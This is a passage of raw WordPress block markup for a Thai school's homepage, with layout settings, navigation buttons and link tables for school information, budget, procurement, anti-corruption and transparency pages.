1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม  No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 